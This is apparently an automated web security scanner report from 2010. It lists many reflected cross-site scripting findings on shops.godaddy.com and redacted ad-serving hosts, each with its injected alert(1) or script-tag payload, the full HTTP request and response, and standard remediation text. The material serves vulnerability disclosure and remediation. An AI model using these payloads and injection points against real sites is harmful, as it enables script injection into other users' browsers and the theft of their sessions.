<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fa1"%3balert(1)//bbdf5b0f8d3 was submitted in the isc parameter. This input was echoed as d7fa1";alert(1)//bbdf5b0f8d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/?isc=GPPT02C021d7fa1"%3balert(1)//bbdf5b0f8d3&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 170462 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=f3pyj4uw1pwofsrxb2krvumr; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Fri, 19-Nov-2010 23:16:29 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Tue, 14-Dec-2010 23:16:29 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021d7fa1";alert(1)//bbdf5b0f8d3&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba487"style%3d"x%3aexpression(alert(1))"d6c6e46d622 was submitted in the isc parameter. This input was echoed as ba487"style="x:expression(alert(1))"d6c6e46d622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/?isc=GPPT02C021ba487"style%3d"x%3aexpression(alert(1))"d6c6e46d622&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 172551 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=xzmssn55reqvt2f1apzqpvac; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Fri, 19-Nov-2010 23:16:18 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Tue, 14-Dec-2010 23:16:18 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 515ad"%3balert(1)//30892ae8648 was submitted in the isc parameter. This input was echoed as 515ad";alert(1)//30892ae8648 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?isc=gppt02C020515ad"%3balert(1)//30892ae8648&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 118708 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=kxbe014523cqbpied14kazzf; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=gppt02C020515ad";alert(1)//30892ae8648&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36e3"style%3d"x%3aexpression(alert(1))"20c23c02f06 was submitted in the isc parameter. This input was echoed as d36e3"style="x:expression(alert(1))"20c23c02f06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /default.aspx?isc=gppt02C020d36e3"style%3d"x%3aexpression(alert(1))"20c23c02f06&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 120537 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=1w0tpy55z3bwg5iexmwqpt55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:15:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3665c"style%3d"x%3aexpression(alert(1))"045772bf281 was submitted in the isc parameter. This input was echoed as 3665c"style="x:expression(alert(1))"045772bf281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?isc=GPPT03A0923665c"style%3d"x%3aexpression(alert(1))"045772bf281&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 121037 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=krdqygfuv113blzgbteilh55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73155"%3balert(1)//03aa7f62ae1 was submitted in the isc parameter. This input was echoed as 73155";alert(1)//03aa7f62ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=GPPT03A09273155"%3balert(1)//03aa7f62ae1&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 119040 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=emalsu551ftnmk2rrtoxsm45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e28d3'%3bf94cb47b1d6 was submitted in the REST URL parameter 4. This input was echoed as e28d3';f94cb47b1d6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.228. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5fcf"><script>alert(1)</script>fe6e7202362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.229. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcad3'-alert(1)-'833bf26ee31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.230. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ecbe"-alert(1)-"2c446c32712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d002e"-alert(1)-"886a23778e6 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb75b'-alert(1)-'06d8e5580f4 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd419"><script>alert(1)</script>20368711ec5 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777f1'%3b37d33a8a9a9 was submitted in the REST URL parameter 4. This input was echoed as 777f1';37d33a8a9a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 241b7</script><script>alert(1)</script>bf2f9eebf88 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a0c'-alert(1)-'0d013425c36 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.237. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55351"><script>alert(1)</script>3dcb11dadeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.238. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15e5c'-alert(1)-'00018051257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.239. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf23"-alert(1)-"a06d375be10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffb8d'%3b283de659ad was submitted in the REST URL parameter 4. This input was echoed as ffb8d';283de659ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33983</script><script>alert(1)</script>1279e68498e was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67974'-alert(1)-'7d4de55c9ba was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.243. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc05"-alert(1)-"4d16990a4be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.244. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a453d'-alert(1)-'34265905669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.245. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49fe0"><script>alert(1)</script>1a99d2b2eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9dc1'%3b640f1826efe was submitted in the REST URL parameter 4. This input was echoed as d9dc1';640f1826efe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bf5'-alert(1)-'c83e9dcce15 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b00</script><script>alert(1)</script>6ae1577146f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.249. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2921b"-alert(1)-"a62026df071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.250. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f3a'-alert(1)-'77e959c3912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.251. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effb9"><script>alert(1)</script>4e33e571c88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24334'%3b23c1c18375b was submitted in the REST URL parameter 4. This input was echoed as 24334';23c1c18375b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... .ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=http://clk.redcated/go/203115616/direct24334';23c1c18375b;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg= ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b43d2'-alert(1)-'9c56d9ef4a6 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... 28x90_PlaA.swf?ver=1&clickTag1=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=b43d2'-alert(1)-'9c56d9ef4a6http://clk.redcated/go/203115616/direct;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsx ...[SNIP]...
3.254. http://redcated/ER1/jview/203115616/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /ER1/jview/203115616/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d431'-alert(1)-'31089bf2ce4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... 8x90_PlaA.swf?ver=1&clickTag1=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=&3d431'-alert(1)-'31089bf2ce4=1http://clk.redcated/go/203115616/direct;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/x ...[SNIP]...
3.255. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /INV/iview/255848431/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18b"><script>alert(1)</script>7d5c27eaf83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d615e'%3b26853c9dad2 was submitted in the REST URL parameter 4. This input was echoed as d615e';26853c9dad2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aec0'-alert(1)-'6257730ab45 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 947c3</script><script>alert(1)</script>71269ad5aa5 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.259. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25caf'-alert(1)-'623465e0d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
